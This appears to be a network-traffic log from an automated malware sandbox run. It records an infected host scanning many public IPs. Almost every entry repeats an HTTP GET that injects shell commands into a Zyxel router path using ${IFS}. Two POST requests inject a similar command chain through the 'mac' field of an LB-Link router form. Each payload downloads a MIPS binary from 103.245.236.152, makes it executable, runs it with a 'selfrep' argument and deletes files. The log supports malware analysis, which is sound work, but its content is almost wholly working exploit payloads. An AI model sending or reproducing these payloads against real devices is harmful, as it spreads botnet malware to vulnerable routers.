                                            Jan 14, 2024 15:50:41.455338955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5025192.168.2.2337566197.12.145.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455349922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5026192.168.2.23474184.40.181.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455394983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5027192.168.2.2353280212.54.90.153443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455413103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5028192.168.2.2357062114.191.218.210443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455429077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5029192.168.2.2336764156.109.191.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455460072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5030192.168.2.2342790195.79.175.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455508947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5031192.168.2.2359710140.159.106.96443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455528975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5032192.168.2.2353274178.134.46.219443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455570936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5033192.168.2.234343448.21.210.128443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455617905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5034192.168.2.234948848.100.42.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455662012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5035192.168.2.2333846196.102.243.167443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.455688953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5036192.168.2.2347572188.217.47.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.458345890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5037192.168.2.23503521.144.184.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.458718061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5038192.168.2.234048241.88.203.146443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.458745956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5039192.168.2.233331853.105.200.187443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.458764076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5040192.168.2.2340944135.120.7.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.458791018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5041192.168.2.236060619.200.191.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.458811045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5042192.168.2.2335750110.167.48.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.458831072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5043192.168.2.2339334103.150.220.157443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:41.458837032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5044192.168.2.235710677.38.47.938080
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.447204113 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                            Jan 14, 2024 15:50:42.674071074 CET351INHTTP/1.1 404 Not Found
                                            CONNECTION: close
                                            CONTENT-LENGTH: 48
                                            Strict-Transport-Security: max-age=604800; includeSubDomains
                                            X-XSS-Protection: 1;mode=block
                                            Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval'
                                            X-Content-Type-Options: nosniff
                                            CONTENT-TYPE: text/html
                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                            Data Ascii: <html><body><h1>404 Not Found</h1></body></html>


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5045192.168.2.235720631.200.24.848080
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.451534033 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                            Cookie: user=admin
                                            Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                            Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5046192.168.2.234260868.105.110.27443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462246895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5047192.168.2.2360808219.121.210.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462280035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5048192.168.2.234005695.234.103.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462321043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5049192.168.2.2359840178.253.14.144443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462332010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5050192.168.2.2345148221.85.81.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462332964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5051192.168.2.234939844.149.9.226443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462363958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5052192.168.2.2348794167.140.200.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462383986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5053192.168.2.2346276204.76.224.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462409973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5054192.168.2.2353270101.159.226.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462447882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5055192.168.2.233836257.85.59.72443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462495089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5056192.168.2.2333910189.190.14.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462507010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5057192.168.2.2356208149.245.23.103443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462517023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5058192.168.2.2336492146.162.189.21443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462538958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5059192.168.2.235899851.254.247.227443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462583065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5060192.168.2.235573891.85.233.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462611914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5061192.168.2.2345332174.130.242.10443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462630987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5062192.168.2.234535282.180.129.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462677002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5063192.168.2.234307023.182.149.173443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462702036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5064192.168.2.234206266.130.43.252443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462727070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5065192.168.2.233852235.130.139.50443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462781906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5066192.168.2.2338348216.164.68.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462801933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5067192.168.2.23479861.49.106.69443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462825060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5068192.168.2.233888089.31.190.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462878942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5069192.168.2.235960496.123.202.114443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462903023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5070192.168.2.234250627.102.58.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462945938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5071192.168.2.233349847.46.134.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462950945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5072192.168.2.234197275.205.1.158443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.462995052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5073192.168.2.235962445.217.34.164443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463013887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5074192.168.2.2353644162.4.193.178443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463036060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5075192.168.2.2339302109.128.115.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463078976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5076192.168.2.2352248219.197.32.93443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463109970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5077192.168.2.2355002157.222.176.61443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463155985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5078192.168.2.2348460143.251.36.189443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463156939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5079192.168.2.2334148110.250.68.180443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463179111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5080192.168.2.2351542177.240.198.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463200092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5081192.168.2.235900834.62.187.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:42.463207960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            5082192.168.2.2333766170.9.24.51443
                                            TimestampBytes transferredDirectionData
